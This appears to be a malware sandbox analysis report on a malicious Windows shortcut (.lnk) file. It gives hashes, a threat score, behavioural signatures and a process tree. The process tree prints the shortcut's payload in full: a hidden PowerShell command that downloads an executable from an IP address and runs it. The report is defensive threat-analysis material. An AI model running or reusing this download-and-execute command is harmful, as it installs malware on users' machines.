Overview

overview

10

Static

static

1

b11bfaa78d...7d.lnk

windows7-x64

8

b11bfaa78d...7d.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    29/12/2024, 01:14 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d.lnk

  • Size

    2KB

  • MD5

    4dab3e7b78ccfc190b36eb728b6e74d0

  • SHA1

    296f5169adbc438e4ec1610d46c0f451417b7b71

  • SHA256

    b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d

  • SHA512

    227e416b6f1f3e465d02da79c9683348d7e26c016fc7c9aa37b9e11189ecb351f0f9d992548182af6831b56e81f2301bd6169ba539aa203457b0823d27a11ee0

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2748

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2748-38-0x000007FEF603E000-0x000007FEF603F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2748-39-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2748-40-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2748-43-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2748-42-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2748-41-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2748-44-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2748-45-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2748-46-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.